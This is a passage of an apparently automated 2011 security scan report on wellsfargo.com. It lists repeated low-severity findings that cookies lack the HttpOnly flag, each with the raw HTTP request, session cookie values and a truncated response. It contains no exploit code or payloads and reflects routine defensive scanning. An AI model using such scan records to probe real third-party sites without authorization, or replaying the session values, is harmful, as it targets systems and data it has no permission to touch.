Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en
Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/product
...[SNIP]...

11.728. https://www.wellsfargo.com/products_services/deposit_cklist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/deposit_cklist

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products_services/deposit_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist
Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

11.729. https://www.wellsfargo.com/products_services/pll_select  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/pll_select

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products_services/pll_select HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:56 GMT
Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select
Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

11.730. https://www.wellsfargo.com/rates/rates_viewall  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /rates/rates_viewall

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rates/rates_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Content-length: 4031
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.731. https://www.wellsfargo.com/savings_cds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /savings_cds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-length: 10180
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Savings Account - Compar
...[SNIP]...

11.732. https://www.wellsfargo.com/savings_cds/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/apply

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /savings_cds/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Open a Savings Account or CD</
...[SNIP]...

11.733. https://www.wellsfargo.com/savings_cds/cds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /savings_cds/cds

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /savings_cds/cds HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:37 GMT
Content-length: 11464
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>CD Account - Find the Best CD
...[SNIP]...

11.734. https://www.wellsfargo.com/search/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /search/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:02 GMT
Content-type: text/html; charset=utf-8
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

11.735. https://www.wellsfargo.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /sitemap

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitemap HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-length: 11525
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Sitemap</title>
   <meta name="
...[SNIP]...

11.736. https://www.wellsfargo.com/student/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /student/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /student/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-length: 11102
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Student Loans, College
...[SNIP]...

11.737. https://www.wellsfargo.com/student/loans/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /student/loans/apply

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /student/loans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:45 GMT
Location: https://www.wellsfargo.com/student/apply
Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/student
...[SNIP]...

11.738. https://www.wellsfargo.com/tas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Origin: https://www.wellsfargo.com
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; JSESSIONID=A063DC75E80493714CD441148D97EDA0; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER
Content-Length: 312

ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&default=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECO
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:01:02 GMT
Content-type: text/html
Set-cookie: TCID=0007ae71-98bc-bd52-84ae-888500000049;Domain=.wellsfargo.com;Expires=Fri, 01-Feb-2013 22:01:02 GMT;Path=/
Set-cookie: NSC_XfmmtGbshp4=445b327f7863;Domain=.wellsfargo.com;Expires=Thu, 03-Feb-2011 02:01:02 GMT;Path=/
Content-Length: 0


11.739. https://www.wellsfargo.com/theprivatebank/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /theprivatebank/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /theprivatebank/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 10631
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>The Private Bank - Wea
...[SNIP]...

11.740. https://www.wellsfargo.com/wachovia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

11.741. https://www.wellsfargo.com/wachovia/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

11.742. https://www.wellsfargo.com/wachovia/autoloans/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/autoloans/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/autoloans/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:12 GMT
Content-length: 4590
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.743. https://www.wellsfargo.com/wachovia/insurance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/insurance

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/insurance HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:13 GMT
Content-length: 5083
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.744. https://www.wellsfargo.com/wachovia/wealthmanagement/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/wealthmanagement/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/wealthmanagement/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 4878
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wachovia to Wells Fargo Inter
...[SNIP]...

11.745. https://www.wellsfargo.com/wf/product/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wf/product/apply

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wf/product/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
X-Cnection: close
Location: https://www.wellsfargo.com:443/customerApp/product/apply
Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com:443/cus
...[SNIP]...

11.746. https://www.wellsfargo.com/wfonline/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wfonline/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wfonline/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 10682
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/
Connection: close


